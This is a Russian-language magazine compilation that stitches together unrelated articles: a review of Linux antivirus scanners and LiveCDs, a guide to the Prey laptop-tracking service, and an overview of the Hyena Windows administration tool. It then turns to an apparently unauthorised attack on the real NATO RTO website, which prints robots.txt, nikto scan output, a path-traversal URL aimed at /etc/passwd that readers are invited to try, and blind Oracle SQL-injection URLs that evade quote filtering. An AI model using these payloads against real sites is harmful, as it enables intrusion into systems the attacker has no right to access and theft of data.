Так поступает, например, BitDefender. Ее продуктом BitDefender Antivirus Scanner for Unices можно пользоваться совершенно бесплатно в личных целях. После заполнения небольшой регистрационной анкеты на офсайте, на почту придет письмо с ключом на год и напоминанием о том, что ключ «for personal usage only». Еще один плюс в копилку BitDefender – количество версий: для скачивания доступны deb- и rpm-пакеты, ipk (универсальный инсталлятор) и tbz для FreeBSD. И все это как для 32-, так и для 64-битных ОС. Также внушает уважение мануал на 128 страниц. В составе антивируса только сканер, монитора нет. Сканер можно запустить как через GUI (есть интеграция с DE), так и через CLI. Сканирование текущего каталога:

$ bdscan ./

Обновление баз:

$ sudo bdscan --update

Как обычно, «man bdscan» покажет много интересных опций.

Еще один бесплатный для персонального использования антивирус – AVG. Есть версии под Linux (deb, rpm, sh и просто архив с бинарниками. Правда, только 32-битные) и FreeBSD (тоже только для x86). Для винды доступна 9-я версия, а для никсов – пока только 8.5 (выпущена в январе 2010), но бета-версию грядущей девятки можно скачать после регистрации. Кроме сканера есть монитор для сканирования на лету. Только включение данной функции не тривиально: нужны специальные модули для ядра (RedirFS или Dazuko). Графического интерфейса у антивируса нет, только CLI. Сканирование текущей директории:

$ avgscan ./

Обновление баз:

$ sudo avgupdate

Очередной претендент – avast. Можно получить бесплатную годовую лицензию на персональное использование после регистрации. Есть deb, rpm и архив с бинарниками. Правда, опять только для 32-бит. Также отсутствует интеграция с DE. Запускается антивирус командой avastgui.

При первом запуске спросит регистрационный ключ или предложит пройти по ссылке и получить его на сайте (однако не ведись: хитрый антивирус отправляет по неправильной ссылке; правильный линк:www.avast.com/registration-free-antivirus.php).

Кроме GUI, есть также CLI-интерфейс. Сканирование текущего каталога:

$ avast ./

Обновление баз:

$ sudo avast-update

Следующий вендор, предлагающий бесплатное домашнее использование своего продукта – F-PROT. Версия для Linux:F-PROT Antivirus for Linux Workstations. Есть версии для Linux (i386, x86-64 и PowerPC), FreeBSD, Solaris (для SPARC и Intel) и даже AIX. Последняя версия для Linux (6.0.3) вышла в декабре 2009 года. Установка осуществляется с помощью скрипта install-f-prot.pl. Скрипт просто создает симлинки в /usr/local/bin (или любой другой указанной директории на скачанные бинарники, поэтому лучше не устанавливать F-Prot, скажем, с рабочего стола, а предварительно переместить его куда-нибудь, например, в /opt). Последняя стадия установки – скачивание обновлений и постановка заданий на ежечасное скачивание обновлений в крон. Запуск:

$ fpscan /

Параметрами можно задать много вещей: например, глубину рекурсии (по умолчанию 30), уровни сканирования и уровень работы эвристика и т.д. (подробнее читай «man fpsan»). Принудительное обновление баз можно запустить командой fpupdate (лежит в инсталляционной директории).

Свобода

Самый известный (и по совместительству – единственный нормальный) OpenSource антивирус – clamav. Есть консольный сканер и несколько GUI к нему (clamtk для GTK и klamav для kde). Может работать также в качестве монитора через DazukoFS. Правда, в большинстве тестов показывает не самые блестящие результаты. Зато есть в репозитории любого дистрибутива, для любой архитектуры, и нет никаких лицензионных ограничений. Самое то для нетребовательных пользователей!

DazukoFS

DazukoFS (от Dateizugriffskontrolle, с немецкого – контроль за доступом к файлам) – специальная ФС, предоставляющая приложениям механизмы для контроля доступа к файлам. Так как DazukoFS не входит в ванильное ядро, для того, чтобы ею воспользоваться, придется пропатчить и пересобрать ядро. DazukoFS используется многими антивирусами для реализации функции монитора.

Первые две версии Dazuko были разработаны и выпущены под лицензией GPL компанией Avira GmbH. Третья версия, получившая название DazukoFS, была полностью переписана уже силами сообщества.

Живой антивирус

LiveCD с антивирусом не раз выручал меня в ситуации, когда нужно было быстро восстановить хоть какую-нибудь работоспособность винды, которая под грузом своих вирусов ни в какую не хотела загружаться. К сожалению, выбор среди подобных инструментов не очень велик – далеко не каждый вендор предлагает свой LiveCD, да еще и на халяву.

Пожалуй, самый известный представитель – Dr.Web LiveCD. Текущая версия (5.02) вышла довольно давно, и пока никаких публичных бета-версий нет (хотя сборка с обновленными базами выходит каждые сутки). Но есть надежда, что, после выхода версии 6 под Linux LiveCD, наконец обновят. Несмотря на то, что сборка основана на не совсем старых компонентах (ядро, например, версии 2.6.30), ветка про LiveCD на официальном форуме drweb полна сообщениями о том, что ОС в графическом режиме не грузится на том или ином железе. На такой случай есть SafeMode с голой консолькой и консольным сканером.

В отличие от Dr.Web, Касперский свой LiveCD особо не афиширует, на офсайте о нем нет даже упоминания. Но от гугла ничего не скроешь! LiveCD можно свободно скачать отсюда. Грузится LiveCD довольно шустро. Только успеешь заметить, что он построен на базе Gentoo и ядре 2.6.31, как выскочит лицензионное соглашение. После принятия условий использования запускается GUI (внешне похожий на kav 2010) с возможностью сканирования и обновления баз.

У AVG тоже есть свой LiveCD. При запуске встречает лицензионным соглашением, которое, конечно же, внимательно прочитав, надо принять (иначе – ребут). Единственный LiveCD, имеющий псевдографический интерфейс. При загрузке автоматически монтирует виндовые разделы, при этом разделы с ФС, отличной от FAT или NTFS, монтировать отказывается. Но из псевдографического интерфейса можно выйти (а при необходимости командой arl запустить опять), смонтировать руками и запустить проверку из консоли. Из полезностей можно еще отметить тулзу для редактирования реестра (Windows Registry Editor).

Бывают случаи, когда результатов проверки одним антивирусом недостаточно. Видимо, так думали создатели дистрибутива ViAvRe (Virtual Antivirus Rechecker), содержащего целый ворох различных антивирусов: Avg, Avast, Doctor Web (CureIt), McAfee, BitDefender, F-Prot. Проект еще очень молодой, но уже подает большие надежды. Последняя на момент написания статьи версия (04.10, вышедшая в апреле этого года) создана на базе OpenSuse 11.2 с помощью SuSeStudio. Еще одна фишка дистрибутива – команда viavre-update, позволяющая обновить базы сразу для всех установленных антивирусов. Выпускается LiveCD в двух редакциях: full версия с KDE (и минимальными требованиями в 768 Мб ОЗУ) и light версия с LXDE (поставляется без антивируса mcafee, avg, firefox, virtualbox и k3b; способна работать на 256 Мб ОЗУ).

Заключение

К сожалению, рассмотреть удалось далеко не все антивирусы для Linux, а только наиболее известные. За бортом остались, например, Panda DesktopSecure for Linux и антивирус от Avira. Но я надеюсь, что и среди представленных вариантов ты при необходимости сможешь найти себе что-нибудь по душе.

INFO

Подробнее про ClamAV читай в Хакере за август 2008 (статья «Побеждаем вирусы в никсах«).

WWW

products.drweb.com/linux – Dr.Web для Linux
www.freedrweb.com/livecd – Dr.Web LiveCD
www.kaspersky.ru/anti-virus_linux_workstation – Антивирус Касперского для Linux Workstation
beta.eset.com/linux – NOD32 для Linux-десктопов
www.bitdefender.com/world/business/antivirus-for-unices.html – BitDefender для Linux
free.avg.com/gb-en/download.prd-afl – AVG Free Edition for Linux
www.avast.com/linux-home-edition – avast! Linux Home Edition
www.clamav.net – ClamAV
code.google.com/p/viavre/ – ViAvRe

WARNING

Помни, что лечение винды с LiveCD не всегда безопасно. На форумах полно тем про то, что после такого лечения винда не загружалась.

Что будет, если просто довериться органам?

Отыскать ноутбук, который попал в чужие руки, теоретически можно. Рассмотрим сначала ситуацию с пропавшим сотовым телефоном. При поступлении заявления в милицию о краже iPhone/BlackBerry и любых других гаджетов, которые умеют звонить, у человека обязательно спрашивают IMEI-код телефона. Это уникальный идентификатор, который жестко вшит в девайс, а потому изменить его крайне сложно (для этого обычно приходится лезть в «железо» девайса). В результате, если кто-то захочет воспользоваться мобильником, то операторы сотовой связи, вероятно, смогут дать ответ, кто именно. Конечно, не любому желающему, а лишь компетентным органам и, более того, по решению суда. Если телефон просто перепродали «как есть» и милиция заморочится по поводу его поиска, то найти его нового обладателя будет несложно. С ноутбуком такой фокус не пройдет. В отличие от телефона у лэптопа нет однозначных уникальных идентификаторов (если не считать MAC-адреса сетевых адаптеров, но они едва ли помогут), которые помогли бы определить его новое местоположение.

Получается, что если самому заблаговременно не оставить возможные лазейки для возвращения ноутбука, то найти его будет крайне трудно. Это как история с ключами. Если куда-то их неудачно закинешь, то искать можно пол-утра. Но если они с дешевым китайским брелком, который начинает пищать на свист, то поиск станут минутным делом. Стало быть, надо нацепить на свой ноутбук такой «брелок». Но как это сделать?

Ноутбук, ты где?

Идеальным помощником могла бы стать специальная программа, которая отсылала бы на определенный сервер информацию о текущем расположении ноутбука. То есть это выглядело бы примерно так: вы всегда бы могли открыть в браузере некий сайт и увидеть на карте, где именно находится лэптоп. Увы, в реальной жизни такого не бывает. GPS-модуль, который мог бы определить текущие координаты, установлен лишь на некоторых моделях нетбуков, и это редкость.

Если смотреть на ситуацию реально, то главной ниточкой к лэптопу может стать сетевой IP-адрес, который получает система при подключении к Интернету. Интернет-провайдер всегда знает, в какое время и кому он выдавал каждый конкретный IP. Получается, что если оставить некоторый маячок, который незаметно будет отправлять текущий IP-адрес, можно выйти на его нового «владельца». Обратившись с запросом к провайдеру, к которому он принадлежит (это общедоступная информация), следователь всегда сможет узнать, где физически находится абонент. Вот она – настоящая зацепка, которая поможет вам вернуть ноутбук, а милиции поставить очередную палочку в своей статистике. Мало этого, помимо IP-адреса с ноутбука можно незаметно передавать массу других данных: скриншот экрана, текущие запущенные программы и самое интересное – изображение с веб-камеры. Как говорится, негодяев надо знать в лицо.

Как это работает?

Установить такую программу может каждый. Одним из наиболее прогрессивных проектов в этой области является сервис Prey, представляющий собой веб-интерфейс для управления устройствами и программу, которая непосредственно устанавливается на каждый ноутбук, за которым необходимо наблюдение. Причем версия этой утилиты есть для Windows, MacOS, Linux и даже Android, поэтомуее без проблем можно установить на любой платформе. Важный этап – создание бесплатной учетной записи. Это необходимо для работы системы. Выполнив несколько простых шагов, пользователь получает доступ к своей панели управления. Самый главный раздел – это «Devices»: здесь определяются ноутбуки, которые необходимо отслеживать. Сервер назначает каждому из них специальный идентификатор (Device Key), который необходимо ввести в параметрах программы. На этом непосредственно настройка заканчивается. Но что дальше?

Большую часть времени Prey работает незаметно. Программа иногда просыпается в системе и обращается на специальный сайт с вопросом: «Что мне делать?». Если никаких указаний от сервера не поступает, программа засыпает до следующего обращения к серверу. Интересна ситуация, если ноутбук украден. В этом случае владелец должен зайти на сайт, выполнить вход в свою панель управления и в настройках нужного ноутбука активировать галочку «Ноутбук украден». Все, как только Prey в следующий раз обратится к серверу и получит команду «Фас», она тут же начнет слать на него такие желанные отчеты. Эту информацию можно сразу же передавать милиции, а самому заниматься спасением данных (читай врезку). Интересно, что если сетевого подключения в какой-то момент не будет, Prey сама попытается подключиться к ближайшей точке доступа Wi-Fi.

Возвращаем файлы с украденного ноутбука

Различные решения для удаленного доступа к файлам и рабочему столу могут сослужить неплохую службу, если ноутбук был украден. Если на лэптопе была установлена бесплатная программаTeamViewer, то пользователь в любой момент может скопировать свои файлы с компьютера, а также получить картинку с удаленного рабочего стола. Система идеально подходит потому, что для подключения не нужно знать текущий IP-адрес ноутбука. Все, что нужно для подключения, – это ввести логин и пароль, которые пользователь сам когда-то установил. Главное опять же, чтобы ноутбук подключили к глобальной сети.

Премудрости поиска

У программы есть два режима работы: «Prey + Control Pane» и «Prey Standalone». В первом случае отчеты и управление программой будут передаваться на сервер проекта, а пользователь через удобную контрольную панель сможет с ними работать. Режим «Prey Standalone» означает, что программа будет работать без сервера, а все данные отправляются на указанный e-mail. Первый вариант более удобный, второй более конспиративный – необходимо выбрать, что больше подходит. Для каждого девайса – особые параметры отчетов. Рекомендую включить сбор всех возможных данных: скриншот экрана, изображение с веб-камеры, информацию о сетевых подключениях и т.д. Опция «Geo» позволяет, как мы уже упоминали, и вовсе передать координаты. Если встроенного GPS-приемника нет, что более чем вероятно, Prey попытается пробить ESSID ближайших точек доступа по общеизвестным базам. Помимо этого, на ноутбук можно отправить сообщение или даже поменять wallpaper. Если лэптоп нужен кровь из носа, то нового владельца можно попытаться уговорить: «Пожалуйста, верните ноутбук за вознаграждение, безопасность гарантирую». Но делать это нужно с особой осторожностью.

Напоследок самое приятное: если в настройках не более трех девайсов, то использовать сервис можно совершенно бесплатно.

Как уберечь данные от лишних глаз

Чтобы быть уверенным, что после пропажи ноутбука у конкурентов вдруг не всплывут готовые отчеты компании или другие конфиденциальные данные, необходимо хранить их в зашифрованном виде. Самый лучший способ – создать надежный криптоконтейнер с паролем. На деле это обычный файл, внутри которого находятся данные. Если знать пароль, то содержимое криптоконтейнера появляется в системе в виде дополнительного логического диска. При этом с файлами пользователь работает, как и обычно, даже не подозревая, что они надежно защищены. Сложная система шифрования крайне проста в эксплуатации. Для этого достаточно установить бесплатную программу TrueCrypt, подключить русификатор и следовать указаниям специального мастера-установщика.

Возможности Hyena

Начинающие сисадмины считают, что настраивать компы в локалке проще при помощи удаленного рабочего стола. В Windows уже встроена такая функция, кроме того, есть множество программ от сторонних разработчиков: Radmin, pcAnywhere, Netop, UltraVNC и так далее. Отчасти это так. Но если систем много, для того, чтобы изменить хотя бы одну настройку, придется подключаться к рабочему столу каждого компьютера, шустрить мышкой, проверять установки. Более опытные админы используют средства «массового» управления, такие как WinRM, PowerShell и SCCM. Популярны и групповые политики (GPO), позволяющие одним щелчком мышки выполнить нужную установку на всех системах. Хотя GPO не очень наглядны, и в сетях большого размера с несколькими доменами весьма непросто отслеживать все настройки и быть уверенным, что тот или иной компьютер находится в требуемом состоянии.

Программа централизованного управления подчиненными системами Hyena по своим возможностям находится где-то посередине между всеми этими инструментами, позволяя отдавать команды, а при необходимости и подключаться к рабочему столу удаленной системы. Разработчики из SystemTools Software Inc. поставили своей целью создать простой в использовании и понятный продукт, который позволял бы управлять компьютерами в сети любого размера и не требовал от админа каких-либо особых знаний или обучения. И, судя по тому, что Hyena пользуется популярностью у десятков тысяч администраторов по всему миру, им это удалось.

Для выполнения любых операций приложение использует пользовательский интерфейс в стиле виндового Проводника с удобным всплывающим контекстным меню и горячими клавишами. Hyena сочетает в себе функции стандартных средств администрирования WinNT: User Manager, Server Manager и File Manager/Explorer, а также и большую часть возможностей, заложенных в консоли управления MMC. Но теперь не придется лазать по разным меню, все это доступно в одном окне. Конечно же, реализованы все стандартные операции по управлению учетными записями пользователей и групп (локальными и домена), правами, компьютерами, устройствами, печатью. По сравнению с MMC все действия более наглядны, кроме того легко переключиться сразу на другую систему, например, для сравнения результата. Выбрав в списке любой компьютер, можно просмотреть список процессов, открытых файлов, сетевых соединений и многое другое. При наличии домена Hyena тесно интегрируется в его структуру, позволяя управлять основными настройками. Параметры и отчеты при необходимости экспортируются в файлы MS Access и Excel. Кроме стандартной версии предлагается еще и Enterprise-вариант, в котором добавлены возможности управления сервером терминалов и сессиями пользователей (в стандартной версии она тоже есть, но работает только 30 дней), почтовыми ящиками Exchange Server 5.5/2000/2003, плюс реализована интеграция с инструментарием WMI.

Hyena может быть использована для управления компьютерами, работающими с любой версией Windows на ядре NT от 2000 и выше. В восьмом релизе добавлена поддержка Win7 и Win2k8R2. Также именно с этого релиза появилась поддержка x64-платформ, объектов политик паролей (PSO, Password Settings Objects), которые стали доступны в Win2k8 и позволяют устанавливать несколько политик паролей в домене.

До версии 8.х для удаленных соединений по RDP и VNC приходилось использовать еще и сторонние продукты, что было весьма неудобно. Теперь в этом уже нет необходимости, так как одно из главных нововведений в восьмерке – возможность подключения к удаленному компьютеру по этим протоколам. Чтобы такая функция была доступна, во время установки следует отметить дополнительный компонент Remote Control Manager (STRCM, его можно скачать отдельно, распространяется как freeware).

Нельзя оставить без внимания еще один немаловажный момент: лицензирование Hyena производится в зависимости от количества администраторов, которые будут активно использовать продукт. Количество рабочих станций и серверов, управляемых с его помощью, на стоимость лицензии не влияет. На сайте доступна полнофункциональная демка, которая будет работать в течение 30 дней. В этот период предлагается и бесплатная поддержка продукта.

Установка стандартна, несколько раз нажимаем Next – и все. Вообще, возможны два варианта использования Hyena. Обычно прогу ставят на рабочем месте админа, откуда он управляет всеми настройками систем, входящих в один или несколько доменов. Но возможен вариант установки Hyena в качестве сервиса на сервере. К нему уже нужно будет подключаться при помощи одной из программ удаленного доступа и далее управлять как самим локальным сервером, на котором установлена Hyena, так и остальными системами сети. Учитывая, что сервер обычно включен в режиме 24/7, соответственно, Hyena тоже всегда будет доступна.

Теперь познакомимся с некоторыми особенностями программы.

Первоначальные настройки

При первом запуске программа собирает все данные о локальной системе и подключается к домену, в который входит компьютер, откуда автоматом импортируется информация обо всех объектах (учетные данные, группы и пользователи, сервисы, устройства и так далее). Возможно, некоторое время придется подождать, по окончании все найденные объекты будут выведены в окне программы в виде дерева. Если доменная структура не используется, остальные системы можно найти, зайдя во вкладку Enterprise и выбрав один из подпунктов – сеть Windows Network (SMB) или службы терминалов Windows.

В том случае, когда в локальной сети работает несколько доменов, настройками которых нужно управлять, остальные следует добавить в список Hyena вручную. Это можно сделать через File – Add Domain; в появившемся окне вводим название домена. Автоматический поиск, активируемый через Find All Domain, упрощает работу – все найденные домены затем будут автоматически добавлены в список. Для уточнения настроек обычно сразу вызывается конфигуратор объектов Object Manager Configuration, в котором при необходимости редактируем объекты. Добавить домен в список можно, вызвав конфигуратор напрямую: File – Manage Object View, заполняем все поля внизу вкладки Objects, нажимаем Add и выбираем в списке Windows Domain. При помощи этого же меню подключаем и многие другие объекты, которые не были найдены программой автоматически: компьютеры, OU, группы, принтеры, URL, ветки реестра и т.д.

Основное конфигурирование

При щелчке на любом объекте отображаются все доступные свойства и параметры, которые можно просмотреть и изменить. Для сортировки элементов в таблицах просто щелкаем по заголовку. Например, выбрав группу или пользователей, мы можем выполнять практически любые административные операции: создавать, удалять, копировать в локальную и удаленную систему, просматривать и редактировать свойства учетных записей и групп (локальной системы и домена). Работа упрощается тем, что во всех настройках помогает визард, в окне которого надо лишь заполнить несколько параметров. Кроме того, выбранному пользователю можно отправить сообщение, сбросить пароль, отключить или разблокировать учетную запись. Практически все подобные действия можно произвести и в отношении групп. Отдельные пункты меню позволяют отслеживать активность пользователей (доступна информация о регистрации и подключениях), поэтому мы всегда можем узнать, кто когда пришел на работу и где лазил в локалке.

Найденные прогой принтеры (как локальные, так и сетевые) отображаются в меню Printers. Выбрав нужный из списка, мы можем получить все сведения о заданиях, доступности, подключиться к нему, изменить свойства и приостановить/продолжить отдельное или все задания.

Следующие интересные возможности: полноценное управление локальными и сетевыми каталогами и файлами. Открыв нужный ресурс, мы можем увидеть содержимое, отредактировать параметры доступа (сетевого и NTFS), просмотреть текущие подключения и сбросить любое при необходимости.

Админу периодически нужно контролировать наличие свободного места на харде. В Hyena это выполнить проще простого. Для разделов жесткого диска выбранного компа выводится информация о типе файловой системы, свободное/занятое место и так далее. При использовании распределенной файловой системы DFS (Distributed File System) в одноименной вкладке мы увидим все доступные ресурсы и сможем к ним быстро подключиться.

Управление сервисами – просмотр списка (с детальным описанием), вывод зависимостей, запуск/перезапуск, остановка, изменение режима запуска – это еще одна полезная возможность Hyena. Службы, отмеченные зеленым значком, выполняются, красным – остановлены. Причем программа позволяет одновременно управлять сервисами на нескольких компьютерах. Аналогично сервисам отображаются и все устройства, драйвера и обновления, установленные на выбранной системе.

Администратор контролирует работу сервисов на основе собранных журналов событий. Для их просмотра переходим во вкладку Events. Для удобства отбора в Hyena реализован фильтр событий Filter Events по типу, дате, времени, учетным данным и т.д. Из контекстного меню вызывается стандартный обозреватель событий Windows, тут же можно сохранить резервную копию журнала или очистить список событий.

Хотя Hyena предлагает еще один вариант: быстро выбрать определенные события и данные при помощи двух пунктов контекстного меню – Account Policy и Audit Policy. Вызываем нужный и в появившемся окне указываем критерии аудита: срок действия пароля, длина пароля, заблокированные учетные записи, доступ к сессиям и многое другое. По умолчанию отслеживаются не все события, поэтому идем в Audit Properties и флажками активируем нужные.

Также просто получить доступ к записям реестра локальной и удаленной системы, просматривать содержимое, добавлять и удалять записи, редактировать настройки, копировать и сохранить ветку реестра в файл.

В Hyena используется собственная система мониторинга ресурсов компьютера, позволяющая собрать данные о производительности системы. Во вкладке Perfomance находим семь подпунктов, которые расскажут все о работе процессов, запущенных в системе, сети, CPU, памяти, дисков и сервера в целом. Можно самостоятельно создавать собственные запросы и редактировать текущие настройки.

Для тех, кто разобрался с WMI, вероятно, будет полезна возможность выполнить определенный запрос или метод. Здесь предложено два способа, ты можешь выбрать более удобный: либо воспользоваться контекстным меню WMI – Execute Query и в окне заполнить WMI Query Template Properties, либо сразу выбрать нужный класс в меню WMI раскрытого дерева параметров конкретной системы. Результат выполнения запроса выводится в панели справа. Кстати, при помощи WMI из контекстного меню можно запустить любой процесс на выбранной системе (WMI – Create Proccess).

Все данные, собранные программой (системы, учетные записи, группы, сервисы и т.д.), легко экспортируются в текстовый файл или отправляются на принтер. При наличии MS Access становится доступной функция создания отчетов с практически неограниченными возможностями. Для этого переходим в Settings – Reporting, указываем путь к исполняемому файлу Access (либо Excel) и запускаем мастер создания отчетов: Tools – Generate Report.

Настройка STRCM

Как уже упоминалось выше, Hyena может быть использована для организации подключения к удаленной системе. RDP-соединение выполняется при помощи штатной утилиты mstsc.exe, вызываемой с необходимыми параметрами. Чтобы использовать VNC, задействуется Remote Control Manager (STRCM), и теоретически здесь можно указать любой VNC-клиент. К слову, STRCM распространяется свободно, а код доступен по лицензии GNU GPL.

Собственно процесс подключения прост: выбираем систему и пункт Remote Control в контекстном меню. Настройки каждого подключения хранятся в отдельном RCM-файле, все они находятся в каталоге, где установлена Hyena. По сути, это текстовые ini-файлы, которые можно редактировать напрямую при помощи Блокнота. После установки таких файлов пять: два из них – rd.rcm и rd_admin.rcm – отвечают за RDP-соединения, а vnc*.rcm представляют собой шаблоны для VNC.

Этот список доступен и в меню Tools – Settings – Remote dialog, где, выбрав нужную конфигурацию и нажав кнопку Edit, также можно приступить к настройкам. Файл имеет простую структуру:

# Описывается подключение
[General]
# Тип подключения: RDP или VNC
SoftwareType=VNC
# Выводить в меню
Enabled=1
# Название
MenuName=TightVNC
# Автозапуск
AutoExecute=0

# Список команд и параметров
[View]
# Команда для подключения
ViewerCommand=vncviewer.exe %computer%
# Для RDP
# ViewerCommand=mstsc.exe

Файл может содержать специфические установки (размер экрана, количество цветов, порт подключения и т.п.) для каждой утилиты.

Удобно, что RCM-файл после редактирования можно просто скопировать на другие системы и не возиться с настройками на каждой из них. Но Hyena поддерживает и сетевые ресурсы, на которых размещаются такие файлы. Их следует указать в настройках при помощи «.RCM file configuration directory path», после чего требуется перезапуск Hyena.

Добавление собственных утилит

При знакомстве с возможностями Hyena бросается в глаза пустой пункт Custom Tools. Разработчики не стали ограничивать админа стандартными решениями и оставили возможность добавить любой инструмент, который можно быстро вызвать из контекстного меню или при помощи комбинации Ctrl-F[1-9]. Настройки утилит производятся в панели Tools – Settings – Tools, вся введенная информация сохраняется в файле tool_cmds.dat, который также можно переносить между компьютерами, чтобы не повторять настройки. Для удобства использования инструменты можно разделить на группы (субменю), которые создаются при помощи New – Submenu. При добавлении инструмента указываем его название и вводим команду, которая будет выполнена при щелчке на пункте. В командной строке поддерживается ряд специальных символов:

%S% – имя текущего сервера, с которого выполняется запрос. Некоторые команды требуют наличия обратного двойного слэша «\\», в таком случае в команду запуска его следует добавить самостоятельно;
%E% – подстановка текста из активного окна, которое появится при выборе объекта;
%G% – группа, в которую входит пользователь, выполнивший запрос;
%HOSTNAME% – возвращает NETBIOS или DNS-имя компьютера (необходимо установить флажок Tools – Settings – Active Directory – Use DNS computer paths);
%Px% – параметры пользователя, их всего три: %P1% – первый, %P2% – второй, %P3% – третий;
%Px:prompt% – параметр пользователя, вводимый по запросу;
%Px:prompt/PWD% – то же, только с вводом пароля.

Заключение

Как видишь, возможностей у Hyena очень много, и они покрывают все потребности среднестатистического админа. Это понятный и хорошо продуманный инструмент, позволяющий централизованно и без лишних усилий управлять системами в локальной сети.

Как известно, Организация Североатлантического договора, известная также под аббревиатурой НАТО, является военно-политическим блоком, созданным давным-давно для противодействия возможным военным действиям, направленным против стран Европы и Америки. Россия (тогда еще Советский Союз) в этот блок не вошла, потому что изначально предполагалось, что и она тоже может эти самые агрессивные военные действия осуществлять.

В структуре НАТО существуют всякого рода организации, которые отвечают за разработки в области безопасности – начиная от военной, научно-технической и заканчивая информационной. И дальше речь пойдет про информационную безопасность, а конкретнее – про научный институт Research & Technology Organisation (RTO), созданный в рамках НАТО.

В нашем журнале уже писали об уязвимостях военных сайтов наших «союзников». Как-то раз герои информационной войны крепко подметили, что у «сетецентрических воинов» безопасность есть, информация есть, а вот безопасность информации – увы, не на высоте. Ну что ж, опровергнем или подтвердим?

Первый осмотр

Научно-исследовательская организация НАТО – предприятие не из маленьких. Под стать финансовому размаху и веб-сайт, который со временем из простой интернет-витрины вырос в целый портал, в дебрях которого теперь хранят даже Военную Тайну. Вот, например, для того, чтобы получить секретные доклады, участникам не менее секретных военных симпозиумов выдают логины и пароли для доступа к файловому серверу и веб-сайту RTO.NATO.INT. Все бы хорошо, вот только участники подкачали – живут они в разных странах и, в основном, за тридевять земель, а посему было велено разместить все это добро на выделенных серверах с подключением к сети Интернет. Здесь сказочке конец, а дальше – начало процесса независимого аудита применяемых решений по защите Военной Тайны подследственной организации.

Посмотрим для начала на такую мелочь, как файл robots.txt:

User-agent: *
Disallow: /images/
Disallow: /img/
Disallow: /homepix/
Disallow: /rndimg/
Disallow: /Include/
Disallow: /hpix/
Disallow: /Mailer/
Disallow: /InfoPack/
Disallow: /aspx/
Disallow: /bin/
Disallow: /cgi-bin/
Disallow: /ContactUs.aspx
Disallow: /Copyright.htm
Disallow: /css/
Disallow: /Detail.asp
Disallow: /enrolments/
Disallow: /FAQ.htm
Disallow: /foad.htm
Disallow: /fr/
Disallow: /help.htm
Disallow: /pfp.ppt
...
Disallow: /Prog/
Disallow: /Reports.asp
Disallow: /SendAbstractDetails.aspx
Disallow: /tor.asp
Disallow: /Taxo/
Disallow: /Variables.asp
Disallow: /variables.asp
Disallow: /voc.htm
Disallow: /vpn.html
Disallow: /Webmail.asp
Disallow: /yourws.asp
Sitemap: http://www.rto.nato.int/sitemap.xml

Написанный явно не в 2010 году, этот путеводитель в мир конфиденциальной информации RTO содержит в себе даже указание на конкретный файл, который можно скачать и посмотреть (pfp.ppt). Надо ли говорить о необходимости использования nikto для сканирования типовых каталогов, если они уже весьма «удачно» перечислены администратором веб-сайта? Ради спортивного интереса, мы все же запустим nikto и проверим, кто выиграл:

---------------------------------------------------------------------------
+ Target IP: 62.23.200.67
+ Target Hostname: www.rto.nato.int
+ Target Port: 80
+ Start Time: 2010-05-08 14:00:15
---------------------------------------------------------------------------
+ Server: RTA Web Server
- /robots.txt - contains 47 'disallow' entries which should be manually viewed. (GET)
- Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD
+ OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST.
- Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ OSVDB-877: HTTP method ('Public' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST.
+ OSVDB-0: ETag header found on server, fields: 0x7036cddda14ca1:18b2
+ OSVDB-3092: GET /sitemap.xml : This gives a nice listing of the site content.
+ 3577 items checked: 49 item(s) reported on remote host
+ End Time: 2010-05-08 14:49:54 (2979 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Test Options: -Cgidirs all -vhost www.rto.nato.int -host www.rto.nato.int www.rto.nato.int

Выиграл все-таки администратор сайта (еще бы, он точно знает про сайт больше, чем nikto ), выразим ему благодарность за отличный справочник по скрытым страницам. Так, например, запись webmail.asp дает нам доступ к внутренней почтовой системе, а запись Detail.asp без всяких сканеров подсказывает нам проверить уязвимости ввода в соответствующем сценарии веб-сервера.

Параллельно ползая по сайту и проверяя все «disallow» записи в robots.txt, подключим webscarab. В его журналах после хождения по «сайтам» часто встречаются неожиданные «вкусности», о которые можно почесать зубы sqlmap’у и w3af’у. Только заговорили об этом и тут же – хлоп, центральный скрипт, который принимает занимательный параметр «topics». Очень интересным он оказывается, если подставить в качестве топика этот же самый скрипт:

http://www.rto.nato.int/Main.asp?topic=Main.asp

При этом, если файл имеет расширение .ASP, то он интерпретируется (например, если мы подставим «Main.asp» в качестве параметра topic, то веб-сервер уйдет в бесконечный цикл, демонстрируя нам зазеркалье – бесконечные вложения Main.asp в самого себя, а если мы укажем только что найденный «pfp.ppt», то получим его бинарное содержимое).

Еще одна мелочь… в нашу свинскую копилку. Тебе, дорогой наш читатель, мы оставляем возможность попробовать комбинации следующего вида:

http://www.rto.nato.int/Main.asp?topic=../../../../../../../../../../../etc/passwd

Oracle всемогущий, Oracle непобедимый

Уже очень долго существует миф о том, что веб-приложения, построенные с бек-эндом в виде СУБД Oracle, неуязвимы к таким атакам как SQL-инъекции и XSS. Миф о невозможности инъекции в Oracle появился из-за функции базы данных использовать метку-заполнитель – при подготовке запроса оператор указывает места (именуя или нумеруя их), где будут впоследствии размещены входные данные SQL-запроса. Но на то он и миф, чтобы его кто-нибудь разрушил (правильное понимание причин появление уязвимости – вот залог возможности разрушения стереотипов). Проблемы с возможностью возникновения SQL-инъекции на самом деле заложены не столько в базе данных, сколько в программе-оболочке, которая реализует взаимодействие с пользователем. Для проверки достаточно ведь использовать несколько простых приемов. Например, добавлять к параметрам строку вида «+or+chr(77)=chr(77)». Использование функции chr() позволяет избежать указания одинарных кавычек, которые нещадно фильтруются.

Именно это является причиной возникновения возможности проведения «слепой» инъекции на сайте RTO. Вот, например, запрос с такой инъекцией:

метод «научного тыка»:

http://www.rto.nato.int/Detail.asp?ID=-1+or+chr(77)=chr(77)

работаем с СУБД Oracle:

http://www.rto.nato.int/Detail.asp?ID=-1+or+1=(SELECT+1+FROM+DUAL)

Собственно, с помощью этой уязвимости мы и узнали, что сзади (backend) установлена СУБД Oracle, а не MySQL или SQLite (кстати, в ней тоже возможно провести SQL-инъекцию – журнал писал об этом в майском номере). Видимо, НАТОвские программисты слишком положились на безопасность Oracle и забыли элементарные правила безопасного секса. А зря! Одна только книжка про оракловский аудит от Ильи Медведовского и его сотрудников чего только стоит.

